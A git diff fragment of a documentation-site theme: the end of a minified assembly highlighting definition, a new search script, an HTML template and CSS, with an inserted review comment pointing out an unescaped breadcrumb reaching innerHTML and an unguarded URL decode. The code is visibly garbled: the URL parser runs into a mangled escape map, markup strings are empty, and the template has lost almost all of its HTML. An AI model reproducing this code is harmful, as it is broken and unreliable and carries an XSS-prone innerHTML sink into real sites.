vcmptrue_usss vcmpss vcomisd vcomiss vcvtdq2pd vcvtdq2ps vcvtpd2dq vcvtpd2ps vcvtps2dq vcvtps2pd vcvtsd2si vcvtsd2ss vcvtsi2sd vcvtsi2ss vcvtss2sd vcvtss2si vcvttpd2dq vcvttps2dq vcvttsd2si vcvttss2si vdivpd vdivps vdivsd vdivss vdppd vdpps vextractf128 vextractps vhaddpd vhaddps vhsubpd vhsubps vinsertf128 vinsertps vlddqu vldqqu vldmxcsr vmaskmovdqu vmaskmovps vmaskmovpd vmaxpd vmaxps vmaxsd vmaxss vminpd vminps vminsd vminss vmovapd vmovaps vmovd vmovq vmovddup vmovdqa vmovqqa vmovdqu vmovqqu vmovhlps vmovhpd vmovhps vmovlhps vmovlpd vmovlps vmovmskpd vmovmskps vmovntdq vmovntqq vmovntdqa vmovntpd vmovntps vmovsd vmovshdup vmovsldup vmovss vmovupd vmovups vmpsadbw vmulpd vmulps vmulsd vmulss vorpd vorps vpabsb vpabsw vpabsd vpacksswb vpackssdw vpackuswb vpackusdw vpaddb vpaddw vpaddd vpaddq vpaddsb vpaddsw vpaddusb vpaddusw vpalignr vpand vpandn vpavgb vpavgw vpblendvb vpblendw vpcmpestri vpcmpestrm vpcmpistri vpcmpistrm vpcmpeqb vpcmpeqw vpcmpeqd vpcmpeqq vpcmpgtb vpcmpgtw vpcmpgtd vpcmpgtq vpermilpd vpermilps vperm2f128 vpextrb vpextrw vpextrd vpextrq vphaddw vphaddd vphaddsw vphminposuw vphsubw vphsubd vphsubsw vpinsrb vpinsrw vpinsrd vpinsrq vpmaddwd vpmaddubsw vpmaxsb vpmaxsw vpmaxsd vpmaxub vpmaxuw vpmaxud vpminsb vpminsw vpminsd vpminub vpminuw vpminud vpmovmskb vpmovsxbw vpmovsxbd vpmovsxbq vpmovsxwd vpmovsxwq vpmovsxdq vpmovzxbw vpmovzxbd vpmovzxbq vpmovzxwd vpmovzxwq vpmovzxdq vpmulhuw vpmulhrsw vpmulhw vpmullw vpmulld vpmuludq vpmuldq vpor vpsadbw vpshufb vpshufd vpshufhw vpshuflw vpsignb vpsignw vpsignd vpslldq vpsrldq vpsllw vpslld vpsllq vpsraw vpsrad vpsrlw vpsrld vpsrlq vptest vpsubb vpsubw vpsubd vpsubq vpsubsb vpsubsw vpsubusb vpsubusw vpunpckhbw vpunpckhwd vpunpckhdq vpunpckhqdq vpunpcklbw vpunpcklwd vpunpckldq vpunpcklqdq vpxor vrcpps vrcpss vrsqrtps vrsqrtss vroundpd vroundps vroundsd vroundss vshufpd vshufps vsqrtpd vsqrtps vsqrtsd vsqrtss vstmxcsr vsubpd vsubps vsubsd vsubss vtestps vtestpd vucomisd vucomiss vunpckhpd vunpckhps vunpcklpd 
vunpcklps vxorpd vxorps vzeroall vzeroupper pclmullqlqdq pclmulhqlqdq pclmullqhqdq pclmulhqhqdq pclmulqdq vpclmullqlqdq vpclmulhqlqdq vpclmullqhqdq vpclmulhqhqdq vpclmulqdq vfmadd132ps vfmadd132pd vfmadd312ps vfmadd312pd vfmadd213ps vfmadd213pd vfmadd123ps vfmadd123pd vfmadd231ps vfmadd231pd vfmadd321ps vfmadd321pd vfmaddsub132ps vfmaddsub132pd vfmaddsub312ps vfmaddsub312pd vfmaddsub213ps vfmaddsub213pd vfmaddsub123ps vfmaddsub123pd vfmaddsub231ps vfmaddsub231pd vfmaddsub321ps vfmaddsub321pd vfmsub132ps vfmsub132pd vfmsub312ps vfmsub312pd vfmsub213ps vfmsub213pd vfmsub123ps vfmsub123pd vfmsub231ps vfmsub231pd vfmsub321ps vfmsub321pd vfmsubadd132ps vfmsubadd132pd vfmsubadd312ps vfmsubadd312pd vfmsubadd213ps vfmsubadd213pd vfmsubadd123ps vfmsubadd123pd vfmsubadd231ps vfmsubadd231pd vfmsubadd321ps vfmsubadd321pd vfnmadd132ps vfnmadd132pd vfnmadd312ps vfnmadd312pd vfnmadd213ps vfnmadd213pd vfnmadd123ps vfnmadd123pd vfnmadd231ps vfnmadd231pd vfnmadd321ps vfnmadd321pd vfnmsub132ps vfnmsub132pd vfnmsub312ps vfnmsub312pd vfnmsub213ps vfnmsub213pd vfnmsub123ps vfnmsub123pd vfnmsub231ps vfnmsub231pd vfnmsub321ps vfnmsub321pd vfmadd132ss vfmadd132sd vfmadd312ss vfmadd312sd vfmadd213ss vfmadd213sd vfmadd123ss vfmadd123sd vfmadd231ss vfmadd231sd vfmadd321ss vfmadd321sd vfmsub132ss vfmsub132sd vfmsub312ss vfmsub312sd vfmsub213ss vfmsub213sd vfmsub123ss vfmsub123sd vfmsub231ss vfmsub231sd vfmsub321ss vfmsub321sd vfnmadd132ss vfnmadd132sd vfnmadd312ss vfnmadd312sd vfnmadd213ss vfnmadd213sd vfnmadd123ss vfnmadd123sd vfnmadd231ss vfnmadd231sd vfnmadd321ss vfnmadd321sd vfnmsub132ss vfnmsub132sd vfnmsub312ss vfnmsub312sd vfnmsub213ss vfnmsub213sd vfnmsub123ss vfnmsub123sd vfnmsub231ss vfnmsub231sd vfnmsub321ss vfnmsub321sd rdfsbase rdgsbase rdrand wrfsbase wrgsbase vcvtph2ps vcvtps2ph adcx adox rdseed clac stac xstore xcryptecb xcryptcbc xcryptctr xcryptcfb xcryptofb montmul xsha1 xsha256 llwpcb slwpcb lwpval lwpins vfmaddpd vfmaddps vfmaddsd vfmaddss vfmaddsubpd vfmaddsubps 
vfmsubaddpd vfmsubaddps vfmsubpd vfmsubps vfmsubsd vfmsubss vfnmaddpd vfnmaddps vfnmaddsd vfnmaddss vfnmsubpd vfnmsubps vfnmsubsd vfnmsubss vfrczpd vfrczps vfrczsd vfrczss vpcmov vpcomb vpcomd vpcomq vpcomub vpcomud vpcomuq vpcomuw vpcomw vphaddbd vphaddbq vphaddbw vphadddq vphaddubd vphaddubq vphaddubw vphaddudq vphadduwd vphadduwq vphaddwd vphaddwq vphsubbw vphsubdq vphsubwd vpmacsdd vpmacsdqh vpmacsdql vpmacssdd vpmacssdqh vpmacssdql vpmacsswd vpmacssww vpmacswd vpmacsww vpmadcsswd vpmadcswd vpperm vprotb vprotd vprotq vprotw vpshab vpshad vpshaq vpshaw vpshlb vpshld vpshlq vpshlw vbroadcasti128 vpblendd vpbroadcastb vpbroadcastw vpbroadcastd vpbroadcastq vpermd vpermpd vpermps vpermq vperm2i128 vextracti128 vinserti128 vpmaskmovd vpmaskmovq vpsllvd vpsllvq vpsravd vpsrlvd vpsrlvq vgatherdpd vgatherqpd vgatherdps vgatherqps vpgatherdd vpgatherqd vpgatherdq vpgatherqq xabort xbegin xend xtest andn bextr blci blcic blsi blsic blcfill blsfill blcmsk blsmsk blsr blcs bzhi mulx pdep pext rorx sarx shlx shrx tzcnt tzmsk t1mskc valignd valignq vblendmpd vblendmps vbroadcastf32x4 vbroadcastf64x4 vbroadcasti32x4 vbroadcasti64x4 vcompresspd vcompressps vcvtpd2udq vcvtps2udq vcvtsd2usi vcvtss2usi vcvttpd2udq vcvttps2udq vcvttsd2usi vcvttss2usi vcvtudq2pd vcvtudq2ps vcvtusi2sd vcvtusi2ss vexpandpd vexpandps vextractf32x4 vextractf64x4 vextracti32x4 vextracti64x4 vfixupimmpd vfixupimmps vfixupimmsd vfixupimmss vgetexppd vgetexpps vgetexpsd vgetexpss vgetmantpd vgetmantps vgetmantsd vgetmantss vinsertf32x4 vinsertf64x4 vinserti32x4 vinserti64x4 vmovdqa32 vmovdqa64 vmovdqu32 vmovdqu64 vpabsq vpandd vpandnd vpandnq vpandq vpblendmd vpblendmq vpcmpltd vpcmpled vpcmpneqd vpcmpnltd vpcmpnled vpcmpd vpcmpltq vpcmpleq vpcmpneqq vpcmpnltq vpcmpnleq vpcmpq vpcmpequd vpcmpltud vpcmpleud vpcmpnequd vpcmpnltud vpcmpnleud vpcmpud vpcmpequq vpcmpltuq vpcmpleuq vpcmpnequq vpcmpnltuq vpcmpnleuq vpcmpuq vpcompressd vpcompressq vpermi2d vpermi2pd vpermi2ps vpermi2q vpermt2d vpermt2pd vpermt2ps 
vpermt2q vpexpandd vpexpandq vpmaxsq vpmaxuq vpminsq vpminuq vpmovdb vpmovdw vpmovqb vpmovqd vpmovqw vpmovsdb vpmovsdw vpmovsqb vpmovsqd vpmovsqw vpmovusdb vpmovusdw vpmovusqb vpmovusqd vpmovusqw vpord vporq vprold vprolq vprolvd vprolvq vprord vprorq vprorvd vprorvq vpscatterdd vpscatterdq vpscatterqd vpscatterqq vpsraq vpsravq vpternlogd vpternlogq vptestmd vptestmq vptestnmd vptestnmq vpxord vpxorq vrcp14pd vrcp14ps vrcp14sd vrcp14ss vrndscalepd vrndscaleps vrndscalesd vrndscaless vrsqrt14pd vrsqrt14ps vrsqrt14sd vrsqrt14ss vscalefpd vscalefps vscalefsd vscalefss vscatterdpd vscatterdps vscatterqpd vscatterqps vshuff32x4 vshuff64x2 vshufi32x4 vshufi64x2 kandnw kandw kmovw knotw kortestw korw kshiftlw kshiftrw kunpckbw kxnorw kxorw vpbroadcastmb2q vpbroadcastmw2d vpconflictd vpconflictq vplzcntd vplzcntq vexp2pd vexp2ps vrcp28pd vrcp28ps vrcp28sd vrcp28ss vrsqrt28pd vrsqrt28ps vrsqrt28sd vrsqrt28ss vgatherpf0dpd vgatherpf0dps vgatherpf0qpd vgatherpf0qps vgatherpf1dpd vgatherpf1dps vgatherpf1qpd vgatherpf1qps vscatterpf0dpd vscatterpf0dps vscatterpf0qpd vscatterpf0qps vscatterpf1dpd vscatterpf1dps vscatterpf1qpd vscatterpf1qps prefetchwt1 bndmk bndcl bndcu bndcn bndmov bndldx bndstx sha1rnds4 sha1nexte sha1msg1 sha1msg2 sha256rnds2 sha256msg1 sha256msg2 hint_nop0 hint_nop1 hint_nop2 hint_nop3 hint_nop4 hint_nop5 hint_nop6 hint_nop7 hint_nop8 hint_nop9 hint_nop10 hint_nop11 hint_nop12 hint_nop13 hint_nop14 hint_nop15 hint_nop16 hint_nop17 hint_nop18 hint_nop19 hint_nop20 hint_nop21 hint_nop22 hint_nop23 hint_nop24 hint_nop25 hint_nop26 hint_nop27 hint_nop28 hint_nop29 hint_nop30 hint_nop31 hint_nop32 hint_nop33 hint_nop34 hint_nop35 hint_nop36 hint_nop37 hint_nop38 hint_nop39 hint_nop40 hint_nop41 hint_nop42 hint_nop43 hint_nop44 hint_nop45 hint_nop46 hint_nop47 hint_nop48 hint_nop49 hint_nop50 hint_nop51 hint_nop52 hint_nop53 hint_nop54 hint_nop55 hint_nop56 hint_nop57 hint_nop58 hint_nop59 hint_nop60 hint_nop61 hint_nop62 hint_nop63",built_in:"ip eip rip al ah bl 
bh cl ch dl dh sil dil bpl spl r8b r9b r10b r11b r12b r13b r14b r15b ax bx cx dx si di bp sp r8w r9w r10w r11w r12w r13w r14w r15w eax ebx ecx edx esi edi ebp esp eip r8d r9d r10d r11d r12d r13d r14d r15d rax rbx rcx rdx rsi rdi rbp rsp r8 r9 r10 r11 r12 r13 r14 r15 cs ds es fs gs ss st st0 st1 st2 st3 st4 st5 st6 st7 mm0 mm1 mm2 mm3 mm4 mm5 mm6 mm7 xmm0 xmm1 xmm2 xmm3 xmm4 xmm5 xmm6 xmm7 xmm8 xmm9 xmm10 xmm11 xmm12 xmm13 xmm14 xmm15 xmm16 xmm17 xmm18 xmm19 xmm20 xmm21 xmm22 xmm23 xmm24 xmm25 xmm26 xmm27 xmm28 xmm29 xmm30 xmm31 ymm0 ymm1 ymm2 ymm3 ymm4 ymm5 ymm6 ymm7 ymm8 ymm9 ymm10 ymm11 ymm12 ymm13 ymm14 ymm15 ymm16 ymm17 ymm18 ymm19 ymm20 ymm21 ymm22 ymm23 ymm24 ymm25 ymm26 ymm27 ymm28 ymm29 ymm30 ymm31 zmm0 zmm1 zmm2 zmm3 zmm4 zmm5 zmm6 zmm7 zmm8 zmm9 zmm10 zmm11 zmm12 zmm13 zmm14 zmm15 zmm16 zmm17 zmm18 zmm19 zmm20 zmm21 zmm22 zmm23 zmm24 zmm25 zmm26 zmm27 zmm28 zmm29 zmm30 zmm31 k0 k1 k2 k3 k4 k5 k6 k7 bnd0 bnd1 bnd2 bnd3 cr0 cr1 cr2 cr3 cr4 cr8 dr0 dr1 dr2 dr3 dr8 tr3 tr4 tr5 tr6 tr7 r0 r1 r2 r3 r4 r5 r6 r7 r0b r1b r2b r3b r4b r5b r6b r7b r0w r1w r2w r3w r4w r5w r6w r7w r0d r1d r2d r3d r4d r5d r6d r7d r0h r1h r2h r3h r0l r1l r2l r3l r4l r5l r6l r7l r8l r9l r10l r11l r12l r13l r14l r15l db dw dd dq dt ddq do dy dz resb resw resd resq rest resdq reso resy resz incbin equ times byte word dword qword nosplit rel abs seg wrt strict near far a32 ptr",meta:"%define %xdefine %+ %undef %defstr %deftok %assign %strcat %strlen %substr %rotate %elif %else %endif %if %ifmacro %ifctx %ifidn %ifidni %ifid %ifnum %ifstr %iftoken %ifempty %ifenv %error %warning %fatal %rep %endrep %include %push %pop %repl %pathsearch %depend %use %arg %stacksize %local %line %comment %endcomment .nolist __FILE__ __LINE__ __SECT__ __BITS__ __OUTPUT_FORMAT__ __DATE__ __TIME__ __DATE_NUM__ __TIME_NUM__ __UTC_DATE__ __UTC_TIME__ __UTC_DATE_NUM__ __UTC_TIME_NUM__ __PASS__ struc endstruc istruc at iend align alignb sectalign daz nodaz up down zero default option assume public bits use16 use32 
use64 default section segment absolute extern global common cpu float __utf16__ __utf16le__ __utf16be__ __utf32__ __utf32le__ __utf32be__ __float8__ __float16__ __float32__ __float64__ __float80m__ __float80e__ __float128l__ __float128h__ __Infinity__ __QNaN__ __SNaN__ Inf NaN QNaN SNaN float8 float16 float32 float64 float80m float80e float128l float128h __FLOAT_DAZ__ __FLOAT_ROUND__ __FLOAT__"},contains:[s.COMMENT(";","$",{relevance:0}),{className:"number",variants:[{begin:"\\b(?:([0-9][0-9_]*)?\\.[0-9_]*(?:[eE][+-]?[0-9_]+)?|(0[Xx])?[0-9][0-9_]*\\.?[0-9_]*(?:[pP](?:[+-]?[0-9_]+)?)?)\\b",relevance:0},{begin:"\\$[0-9][0-9A-Fa-f]*",relevance:0},{begin:"\\b(?:[0-9A-Fa-f][0-9A-Fa-f_]*[Hh]|[0-9][0-9_]*[DdTt]?|[0-7][0-7_]*[QqOo]|[0-1][0-1_]*[BbYy])\\b"},{begin:"\\b(?:0[Xx][0-9A-Fa-f_]+|0[DdTt][0-9_]+|0[QqOo][0-7_]+|0[BbYy][0-1_]+)\\b"}]},s.QUOTE_STRING_MODE,{className:"string",variants:[{begin:"'",end:"[^\\\\]'"},{begin:"`",end:"[^\\\\]`"}],relevance:0},{className:"symbol",variants:[{begin:"^\\s*[A-Za-z._?][A-Za-z0-9_$#@~.?]*(:|\\s+label)"},{begin:"^\\s*%%[A-Za-z0-9_$#@~.?]*:"}],relevance:0},{className:"subst",begin:"%[0-9]+",relevance:0},{className:"subst",begin:"%!S+",relevance:0},{className:"meta",begin:/^\s*\.[\w_-]+/}]}}}()); \ No newline at end of file diff --git a/theme/ht_searcher.js b/theme/ht_searcher.js new file mode 100644 index 000000000..1cee01a8c --- /dev/null +++ b/theme/ht_searcher.js 
@@ -0,0 +1,486 @@ +"use strict"; +window.search = window.search || {}; +(function search(search) { + // Search functionality + // + // You can use !hasFocus() to prevent keyhandling in your key + // event handlers while the user is typing their search. + + if (!Mark || !elasticlunr) { + return; + } + + //IE 11 Compatibility from https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/startsWith + if (!String.prototype.startsWith) { + String.prototype.startsWith = function(search, pos) { + return this.substr(!pos || pos < 0 ? 0 : +pos, search.length) === search; + }; + } + + var search_wrap = document.getElementById('search-wrapper'), + search_modal = document.getElementById('search-modal'), + searchbar = document.getElementById('searchbar'), + searchbar_outer = document.getElementById('searchbar-outer'), + searchresults = document.getElementById('searchresults'), + searchresults_outer = document.getElementById('searchresults-outer'), + searchresults_header = document.getElementById('searchresults-header'), + searchicon = document.getElementById('search-toggle'), + content = document.getElementById('content'), + + searchindex = null, + doc_urls = [], + results_options = { + teaser_word_count: 30, + limit_results: 30, + }, + search_options = { + bool: "AND", + expand: true, + fields: { + title: {boost: 1}, + body: {boost: 1}, + breadcrumbs: {boost: 0} + } + }, + mark_exclude = [], + marker = new Mark(content), + current_searchterm = "", + URL_SEARCH_PARAM = 'search', + URL_MARK_PARAM = 'highlight', + teaser_count = 0, + + SEARCH_HOTKEY_KEYCODE = 83, + ESCAPE_KEYCODE = 27, + DOWN_KEYCODE = 40, + UP_KEYCODE = 38, + SELECT_KEYCODE = 13; + + function hasFocus() { + return searchbar === document.activeElement; + } + + function removeChildren(elem) { + while (elem.firstChild) { + elem.removeChild(elem.firstChild); + } + } + + // Helper to parse a url into its building blocks. 
+ function parseURL(url) { + var a = document.createElement('a'); + a.href = url; + return { + source: url, + protocol: a.protocol.replace(':',''), + host: a.hostname, + port: a.port, + params: (function(){ + var ret = {}; + var seg = a.search.replace(/^\?/,'').split('&'); + var len = seg.length, i = 0, s; + for (;i': '>', + '"': '"', + "'": ''' + }; + var repl = function(c) { return MAP[c]; }; + return function(s) { + return s.replace(/[&<>'"]/g, repl); + }; + })(); + + function formatSearchMetric(count, searchterm) { + if (count == 1) { + return count + " search result for '" + searchterm + "':"; + } else if (count == 0) { + return "No search results for '" + searchterm + "'."; + } else { + return count + " search results for '" + searchterm + "':"; + } + } + + function formatSearchResult(result, searchterms) { + var teaser = makeTeaser(escapeHTML(result.doc.body), searchterms); + teaser_count++; + + // The ?URL_MARK_PARAM= parameter belongs inbetween the page and the #heading-anchor + var url = doc_urls[result.ref].split("#"); + if (url.length == 1) { // no anchor found + url.push(""); + } + + // encodeURIComponent escapes all chars that could allow an XSS except + // for '. Due to that we also manually replace ' with its url-encoded + // representation (%27). + var searchterms = encodeURIComponent(searchterms.join(" ")).replace(/\'/g, "%27"); + + return '' + result.doc.breadcrumbs + + '' + + teaser + '' + ''; + } + + function makeTeaser(body, searchterms) { + // The strategy is as follows: + // First, assign a value to each word in the document: + // Words that correspond to search terms (stemmer aware): 40 + // Normal words: 2 + // First word in a sentence: 8 + // Then use a sliding window with a constant number of words and count the + // sum of the values of the words within the window. Then use the window that got the + // maximum sum. If there are multiple maximas, then get the last one. + // Enclose the terms in . 
+ var stemmed_searchterms = searchterms.map(function(w) { + return elasticlunr.stemmer(w.toLowerCase()); + }); + var searchterm_weight = 40; + var weighted = []; // contains elements of ["word", weight, index_in_document] + // split in sentences, then words + var sentences = body.toLowerCase().split('. '); + var index = 0; + var value = 0; + var searchterm_found = false; + for (var sentenceindex in sentences) { + var words = sentences[sentenceindex].split(' '); + value = 8; + for (var wordindex in words) { + var word = words[wordindex]; + if (word.length > 0) { + for (var searchtermindex in stemmed_searchterms) { + if (elasticlunr.stemmer(word).startsWith(stemmed_searchterms[searchtermindex])) { + value = searchterm_weight; + searchterm_found = true; + } + }; + weighted.push([word, value, index]); + value = 2; + } + index += word.length; + index += 1; // ' ' or '.' if last word in sentence + }; + index += 1; // because we split at a two-char boundary '. ' + }; + + if (weighted.length == 0) { + return body; + } + + var window_weight = []; + var window_size = Math.min(weighted.length, results_options.teaser_word_count); + + var cur_sum = 0; + for (var wordindex = 0; wordindex < window_size; wordindex++) { + cur_sum += weighted[wordindex][1]; + }; + window_weight.push(cur_sum); + for (var wordindex = 0; wordindex < weighted.length - window_size; wordindex++) { + cur_sum -= weighted[wordindex][1]; + cur_sum += weighted[wordindex + window_size][1]; + window_weight.push(cur_sum); + }; + + if (searchterm_found) { + var max_sum = 0; + var max_sum_window_index = 0; + // backwards + for (var i = window_weight.length - 1; i >= 0; i--) { + if (window_weight[i] > max_sum) { + max_sum = window_weight[i]; + max_sum_window_index = i; + } + }; + } else { + max_sum_window_index = 0; + } + + // add around searchterms + var teaser_split = []; + var index = weighted[max_sum_window_index][2]; + for (var i = max_sum_window_index; i < max_sum_window_index+window_size; i++) { + var word = 
weighted[i]; + if (index < word[2]) { + // missing text from index to start of `word` + teaser_split.push(body.substring(index, word[2])); + index = word[2]; + } + if (word[1] == searchterm_weight) { + teaser_split.push("") + } + index = word[2] + word[0].length; + teaser_split.push(body.substring(word[2], index)); + if (word[1] == searchterm_weight) { + teaser_split.push("") + } + }; + + return teaser_split.join(''); + } + + function init(config) { + results_options = config.results_options; + search_options = config.search_options; + searchbar_outer = config.searchbar_outer; + doc_urls = config.doc_urls; + searchindex = elasticlunr.Index.load(config.index); + + // Set up events + searchicon.addEventListener('click', function(e) { searchIconClickHandler(); }, false); + search_wrap.addEventListener('click', function(e) { searchIconClickHandler(); }, false); + search_modal.addEventListener('click', function(e) { e.stopPropagation(); }, false); + searchbar.addEventListener('keyup', function(e) { searchbarKeyUpHandler(); }, false); + document.addEventListener('keydown', function(e) { globalKeyHandler(e); }, false); + // If the user uses the browser buttons, do the same as if a reload happened + window.onpopstate = function(e) { doSearchOrMarkFromUrl(); }; + // Suppress "submit" events so the page doesn't reload when the user presses Enter + document.addEventListener('submit', function(e) { e.preventDefault(); }, false); + + // If reloaded, do the search or mark again, depending on the current url parameters + doSearchOrMarkFromUrl(); + } + + function unfocusSearchbar() { + // hacky, but just focusing a div only works once + var tmp = document.createElement('input'); + tmp.setAttribute('style', 'position: absolute; opacity: 0;'); + searchicon.appendChild(tmp); + tmp.focus(); + tmp.remove(); + } + + // On reload or browser history backwards/forwards events, parse the url and do search or mark + function doSearchOrMarkFromUrl() { + // Check current URL for search request 
+ var url = parseURL(window.location.href); + if (url.params.hasOwnProperty(URL_SEARCH_PARAM) + && url.params[URL_SEARCH_PARAM] != "") { + showSearch(true); + searchbar.value = decodeURIComponent( + (url.params[URL_SEARCH_PARAM]+'').replace(/\+/g, '%20')); + searchbarKeyUpHandler(); // -> doSearch() + } else { + showSearch(false); + } + + if (url.params.hasOwnProperty(URL_MARK_PARAM)) { + var words = decodeURIComponent(url.params[URL_MARK_PARAM]).split(' '); + marker.mark(words, { + exclude: mark_exclude + }); + + var markers = document.querySelectorAll("mark"); + function hide() { + for (var i = 0; i < markers.length; i++) { + markers[i].classList.add("fade-out"); + window.setTimeout(function(e) { marker.unmark(); }, 300); + } + } + for (var i = 0; i < markers.length; i++) { + markers[i].addEventListener('click', hide); + } + } + } + + // Eventhandler for keyevents on `document` + function globalKeyHandler(e) { + if (e.altKey || e.ctrlKey || e.metaKey || e.shiftKey || e.target.type === 'textarea' || e.target.type === 'text' || !hasFocus() && /^(?:input|select|textarea)$/i.test(e.target.nodeName)) { return; } + + if (e.keyCode === ESCAPE_KEYCODE) { + e.preventDefault(); + searchbar.classList.remove("active"); + setSearchUrlParameters("", + (searchbar.value.trim() !== "") ? 
"push" : "replace"); + if (hasFocus()) { + unfocusSearchbar(); + } + showSearch(false); + marker.unmark(); + } else if (!hasFocus() && e.keyCode === SEARCH_HOTKEY_KEYCODE) { + e.preventDefault(); + showSearch(true); + window.scrollTo(0, 0); + searchbar.select(); + } else if (hasFocus() && e.keyCode === DOWN_KEYCODE) { + e.preventDefault(); + unfocusSearchbar(); + searchresults.firstElementChild.classList.add("focus"); + } else if (!hasFocus() && (e.keyCode === DOWN_KEYCODE + || e.keyCode === UP_KEYCODE + || e.keyCode === SELECT_KEYCODE)) { + // not `:focus` because browser does annoying scrolling + var focused = searchresults.querySelector("li.focus"); + if (!focused) return; + e.preventDefault(); + if (e.keyCode === DOWN_KEYCODE) { + var next = focused.nextElementSibling; + if (next) { + focused.classList.remove("focus"); + next.classList.add("focus"); + } + } else if (e.keyCode === UP_KEYCODE) { + focused.classList.remove("focus"); + var prev = focused.previousElementSibling; + if (prev) { + prev.classList.add("focus"); + } else { + searchbar.select(); + } + } else { // SELECT_KEYCODE + window.location.assign(focused.querySelector('a')); + } + } + } + + function showSearch(yes) { + if (yes) { + search_wrap.classList.remove('hidden'); + searchicon.setAttribute('aria-expanded', 'true'); + } else { + search_wrap.classList.add('hidden'); + searchicon.setAttribute('aria-expanded', 'false'); + var results = searchresults.children; + for (var i = 0; i < results.length; i++) { + results[i].classList.remove("focus"); + } + } + } + + function showResults(yes) { + if (yes) { + searchresults_outer.classList.remove('hidden'); + } else { + searchresults_outer.classList.add('hidden'); + } + } + + // Eventhandler for search icon + function searchIconClickHandler() { + if (search_wrap.classList.contains('hidden')) { + showSearch(true); + window.scrollTo(0, 0); + searchbar.select(); + } else { + showSearch(false); + } + } + + // Eventhandler for keyevents while the searchbar is 
focused + function searchbarKeyUpHandler() { + var searchterm = searchbar.value.trim(); + if (searchterm != "") { + searchbar.classList.add("active"); + doSearch(searchterm); + } else { + searchbar.classList.remove("active"); + showResults(false); + removeChildren(searchresults); + } + + setSearchUrlParameters(searchterm, "push_if_new_search_else_replace"); + + // Remove marks + marker.unmark(); + } + + // Update current url with ?URL_SEARCH_PARAM= parameter, remove ?URL_MARK_PARAM and #heading-anchor . + // `action` can be one of "push", "replace", "push_if_new_search_else_replace" + // and replaces or pushes a new browser history item. + // "push_if_new_search_else_replace" pushes if there is no `?URL_SEARCH_PARAM=abc` yet. + function setSearchUrlParameters(searchterm, action) { + var url = parseURL(window.location.href); + var first_search = ! url.params.hasOwnProperty(URL_SEARCH_PARAM); + if (searchterm != "" || action == "push_if_new_search_else_replace") { + url.params[URL_SEARCH_PARAM] = searchterm; + delete url.params[URL_MARK_PARAM]; + url.hash = ""; + } else { + delete url.params[URL_MARK_PARAM]; + delete url.params[URL_SEARCH_PARAM]; + } + // A new search will also add a new history item, so the user can go back + // to the page prior to searching. A updated search term will only replace + // the url. 
+ if (action == "push" || (action == "push_if_new_search_else_replace" && first_search) ) { + history.pushState({}, document.title, renderURL(url)); + } else if (action == "replace" || (action == "push_if_new_search_else_replace" && !first_search) ) { + history.replaceState({}, document.title, renderURL(url)); + } + } + + function doSearch(searchterm) { + + // Don't search the same twice + if (current_searchterm == searchterm) { return; } + else { current_searchterm = searchterm; } + + if (searchindex == null) { return; } + + // Do the actual search + var results = searchindex.search(searchterm, search_options); + var resultcount = Math.min(results.length, results_options.limit_results); + + // Display search metrics + searchresults_header.innerText = formatSearchMetric(resultcount, searchterm); + + // Clear and insert results + var searchterms = searchterm.split(' '); + removeChildren(searchresults); + for(var i = 0; i < resultcount ; i++){ + var resultElem = document.createElement('li'); + resultElem.innerHTML = formatSearchResult(results[i], searchterms); + searchresults.appendChild(resultElem); + } + + // Display results + showResults(true); + } + + fetch(path_to_root + 'searchindex.json') + .then(response => response.json()) + .then(json => init(json)) + .catch(error => { // Try to load searchindex.js if fetch failed + var script = document.createElement('script'); + script.src = path_to_root + 'searchindex.js'; + script.onload = () => init(window.search); + document.head.appendChild(script); + }); + + // Exported functions + search.hasFocus = hasFocus; +})(window.search); \ No newline at end of file diff --git a/theme/index.hbs b/theme/index.hbs new file mode 100644 index 000000000..ecd2565f4 --- /dev/null +++ b/theme/index.hbs 
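Review bot: In `formatSearchResult` the `result.doc.breadcrumbs` value is concatenated into the result markup without `escapeHTML`, while `result.doc.body` is escaped before it reaches `makeTeaser`; since `doSearch` assigns that string to `resultElem.innerHTML`, any markup present in a page title or breadcrumb in `searchindex.json` is rendered rather than shown as text. Wrapping it the same way, `escapeHTML(result.doc.breadcrumbs)`, keeps both fields on the same footing (the exact surrounding tags are not visible here, as the extraction dropped them). Separately, `doSearchOrMarkFromUrl` calls `decodeURIComponent` on the raw `search` and `highlight` query parameters; a malformed percent-sequence throws a `URIError` out of `init`, which the fetch `.catch` then treats as a failed index load and retries through `searchindex.js`, where it throws again. Guarding those two calls with a try/catch that falls back to the raw value would keep a bad URL from disabling search on the page.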
@@ -0,0 +1,392 @@ + + + + + + {{ title }} + {{#if is_print }} + + {{/if}} + {{#if base_url}} + + {{/if}} + + + {{> head}} + + + + + + {{#if favicon_svg}} + + {{/if}} + {{#if favicon_png}} + + {{/if}} + + + + {{#if print_enable}} + + {{/if}} + + + + {{#if copy_fonts}} + + {{/if}} + + + + + + + + {{#each additional_css}} + + {{/each}} + + {{#if mathjax_support}} + + + {{/if}} + + + + + + + +
+ + + + + + + + + + + +
+ {{#if search_enabled}} + + {{/if}} + +
+ {{> header}} + + +
+ + + + +
+
+ + {{{ content }}} +
+ + + + +
+ +
+ +
+
+ +
+ + + +
+ + {{#if live_reload_endpoint}} + + + {{/if}} + + {{#if google_analytics}} + + + {{/if}} + + {{#if playground_line_numbers}} + + {{/if}} + + {{#if playground_copyable}} + + {{/if}} + + {{#if playground_js}} + + + + + + {{/if}} + + {{#if search_js}} + + + + {{/if}} + + + + + + + {{#each additional_js}} + + {{/each}} + + + + + + {{#if is_print}} + {{#if mathjax_support}} + + {{else}} + + {{/if}} + {{/if}} + +
+ + diff --git a/theme/pagetoc.css b/theme/pagetoc.css new file mode 100644 index 000000000..d979c7427 --- /dev/null +++ b/theme/pagetoc.css 
@@ -0,0 +1,189 @@ +@media only screen and (max-width:1439px) { + .sidetoc { + display: none !important; + } + .mobilesponsor { + margin-top: 25px; + max-height: 40%; + height: 40%; + background-color: var(--bg); + border: 1px solid var(--table-border-color); + border-radius: 8px; + padding: 5px; + display: none; /*changed via JS once ad is loaded*/ + flex-direction: column; + text-decoration: none !important; + } + .mobilesponsor img { + height: auto; + width: 40%; + padding: 10px; + transition-property: all; + transition-timing-function: cubic-bezier(.4,0,.2,1); + transition-duration: .3s; + } + /* .mobilesponsor:hover img{ + width: 30%; + } */ + .mobilesponsor .mobilesponsor-title{ + margin-top: 5px; + margin-bottom: 5px; + margin-left: 15px; + margin-right: 15px; + font-weight: 800; + font-size: 2rem; + color: var(--sponsor-fg); + } + .mobilesponsor .mobilesponsor-description{ + display:block; + margin-top: 5px; + margin-bottom: 15px; + margin-left: 15px; + margin-right: 15px; + color: var(--sponsor-fg); + 